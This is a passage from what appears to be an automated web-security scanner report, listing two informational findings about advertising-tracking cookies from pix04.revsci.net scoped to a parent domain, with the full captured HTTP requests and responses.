Location: http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912?AQB=1&pccr=true&vidn=26E39E5A851D2CAB-6000010360000EE4&&ndh=1&t=8/4/2011%2020%3A0%3A34%200%20300&ns=ftdcom&pageName=Home%20Page&g=http%3A//www.ftd.com/&r=http%3A//www.ftd.com/&cc=USD&events=event13&c1=351&v1=351&c2=Main%20Site&v2=Main%20Site&c3=Main%20Site&v3=Main%20Site&c4=Main&v4=Main&c5=351%3AHome%20Page&c6=Main%20Site%3AHome%20Page&c7=Main%20Site%3AHome%20Page&c8=Main%3AHome%20Page&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 01:00:37 GMT
Last-Modified: Tue, 10 May 2011 01:00:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www27
Content-Length: 0
Content-Type: text/plain

12.25. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fproduct&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyrPTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0s-X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z47ss1gIQbtAeUuoVo77dVqYeIRwAKs9EYrs0bIzTjXSAI5GrN/VOLEyI1bPgjy4/AFBHtPBBeRyEWvaoNoXROdLJvi3gQYGigFiDN969IWG32y70J0kCW3oMNJVeFxoY8g/1NXHKR81f92XzRwEEaechhuI7uy7dcc9MVeFF3QxE9As3DRaWjE6nvnLfYNB3YmeW1b2PEkOddDegqkcWnYHDCwWypfg0peQ4M/ad9SnRxVGCIB95D09juPew6Bf8fuP6cf26V67hxb2rERm5uxw3CBAc5RUGL10a3XvdVmxgmsCJ59k8ObBQeB08aKGs9qVHNZ1+YNtKOdz/H4vLTpF6Q0aVLEITXMUWM0kFYEixtHIRVqHt8LLeQHn4V8XAnn3cZ8mWm2zH69ORkxf7b5b/Qtb/U1IC8Q/BkkrpQeSpcKuPgo+T3oGOhVojzET9IEWIF5MIvtitsf1jV1ZyK9BnRZEi/UOgHVjQ5y0ItR0F9Z80m448LEJ/KkFgAUw==; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
Set-Cookie: rtc__Lvf=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:09:43 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:09:42 GMT

12.26. http://pix04.revsci.net/K10145/a3/0/3/pg.302  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K10145/a3/0/3/pg.302

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K10145/a3/0/3/pg.302?D=DM_LOC%3Dhttp%253A%252F%252F1800flowers.com%252Fwelcome&tgt=http%3A%2F%2Fads.revsci.net%2Fadserver%2Fako%3Factivate%26type%3Dgif%26csid%3DK10145 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_JXtz=MLsXtzE1ZxpnJ5GrHvmWF/KWrPo31Agpb5slCPedGNAwVTi74gkGz+Ioj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8PzolTSqS7RsUjlJjpOBJV4OQhg8QGT4qzmd32wLpi/idGBjih+awrUoKWaJ0K1B1Lomb0QkvRD26c4T9RWug2cO4FjzKAUk/0qUcoDTyVussQkDgGXRawu/DgYy8AQYowPQYovmciLKxDbxy63oR0tY9ui/NiCYn/cnzTG4mUrhXRSpVst8UQQg9UDg0tgeixM8uBejqsKnVnMHc9P9FTM7x/ggwgrQzGUjVo6BefFXgFaQMIq+AXZcR/zpqBBsaLusDfUMdaCoeRbtAAVUE2mPvTEZu/93IB+zgKsSSVbDbVKROB1dqyeuXojAa7aHmb6eu+5ZmujQ0hRHn3xtEalcmuMeIg3WRnEijYtYALyQhp73E6VAmilQtoTPiNnBpnYBOsQoPgwgptLgSn07OG+jh5lrW7RTgIKy6MXkkmkQhCWZXO5mYNKzaRPm5xTNWXdC2579VbAg5n3aFD4xHuBpLc1V4ElYMePMZdeAdlgtT0E6Bx+Nlet6sPh5w2kN9EGCAsoXpjef+SbJ6yj1XtqK/Ti4AW2t0WrjxZ+ZdhqeYyX2/xogbUb/mgHumrix8fG9wK1NOIuNbpYW55sLR+aqooY9f7I2Zb0/Y4FhxjSKXWeh8Wap9wk65kZYLh9kAq0vrvz5Qi9Q/ZEgsrAd+fuTGh+Rs0UYPCj/jKhV2sOX+dhl0rauwPPPDupVHqmA11y8OaIDcpDa40Ec+aQmnD1Fg27ft7srSL4do5uyHD6m6pzT5gt/lh1IEBu7j624K+xXaxFrGmoe9um+HHVewxEiqK1yBPju68o7c4sEE6uv1R7tqhcphC80uE6bJsLcvZGgmVNLQoRmZu+19T6S/xFwIm0CESwJweNmTY93I8wQWuSkfvZPw3CXLkLuMOgDCuaebRsxiEO6Ve6CksLxbQx9Y5wo/Y6ljLXS6W8TuXPg8Ajn5DU+Gi7u6DUWdBc3GEgPZ4yACxIzv1Ht2Sa9lB0jhrHo/7Az8dBX7jueoWaMLanZ233NKdMdp+CJe8rutyK9A4GiO/JUhmI9K6dIDyOLSc4CAUt8mYfqlj3OYYg5jHXX8T05v6nQrJDyj95cvG4Z4jCeVWfvZ67L9q8UCKCd8w/lnvZvmyZKJJHPmUsWaIp/R8cDID5iXMFfc7AjdPWSXxeIYwJg9CwbkPsH6kXw8r0Oqf+XkEFay3UyruKRLC/1ue7DUS06B9fKLJFdj1f9LkA1cTpsnTLax8shJVlffoxUmGUzIDD92ECFG+DvSakohNl+OCiyZe+o3RcTToFAQ07UwbeMPaqA3lvSgwmqNpCpclQXSYtB1HznkXyZTA53rtFtSU+gRUvyL7AbO5Nev/zyDtnqcR5ujoU8PPUHYK7LfI3Ikvsuf5Q1AXNSohTIoIOj09vCTD62+I86CBu6sVVo=; rsi_segs_1000000=pUPFJDOBMHIQVvnT1blQz8+baFxQ8VBJwUYXJQfxR8hdOmO+AHY96MgE2HH6CmX/5rpwfY7JO7GQbw+x0vTTyYTOIx2ZJQQ/7c80AtQM4pGkI6RvQfdRIcsnFzpZRgLIoXYqKwe+54D5QS81AVhvtmcaRxnciyd6EdE0KeguIATF83m4/f+fVziCnRMgl7sqU6Sa/J1XXkPZFhQYsZKhWrt1Gbzoo/ewmDD+RJz5tk5lNRf6xXNYld1nrfSo0UrDLbRZGlm7wWl6ke0ppuq4f3sCZaCIs+ZXHUE9R/CQ81JHOuOaYMbo6FoCEApDFDL/NkhPqNg7IwVDZzGwWYTLw5QZqCfu/tPHcwDKvWbqxN2eclT+QlLzUIYvwEv/oWz8LDA27cJm1eotXrOMy0BE0BzCBgZ3AotZBRfFnYOtAXoRvXQ05vrGogWxJ3y9cmr3r8HOUQ78SAC4SkFLRSG1wnfyfgaBIAfgso/P/FaCOhhqzcCrUl+VnY9xUpqKk6LIxpYUKNIMDox6kXUjig==; 